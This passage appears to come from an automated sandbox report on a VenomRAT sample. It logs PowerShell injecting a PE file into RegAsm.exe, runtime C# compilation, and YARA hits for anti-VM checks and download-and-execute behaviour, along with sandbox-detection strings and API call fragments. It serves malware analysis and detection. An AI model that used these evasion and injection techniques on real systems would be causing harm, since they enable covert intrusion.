            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Yara detected VenomRAT
            Source: Yara matchFile source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1120000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4432Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5441Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8286Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1554Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7404Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7536Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
            Source: RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
            Source: powershell.exe, 00000000.00000002.1317149566.00000219C381B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3700644212.00000000052B9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3699357352.000000000528F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3686261366.0000000000F39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            .NET source code references suspicious native API functions
            Source: 0.2.powershell.exe.219c3ad0000.13.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 0.2.powershell.exe.219c3ad0000.13.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 0.2.powershell.exe.219c3ad0000.13.raw.unpack, ClasserPlus.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
            Compiles code for process injection (via .Net compiler)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.0.csJump to dropped file
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 700000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 702000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A33008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1079.tmp" "c:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP"Jump to behavior
            Source: RegAsm.exe, 0000000A.00000002.3687725742.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3687725742.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3687725742.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ProgMan
            Source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd!SHELLDLL_DefView
            Source: RegAsm.exe, 0000000A.00000002.3687725742.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3687725742.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3687725742.0000000002DB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,
            Source: RegAsm.exe, 0000000A.00000002.3687725742.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3687725742.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3687725742.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
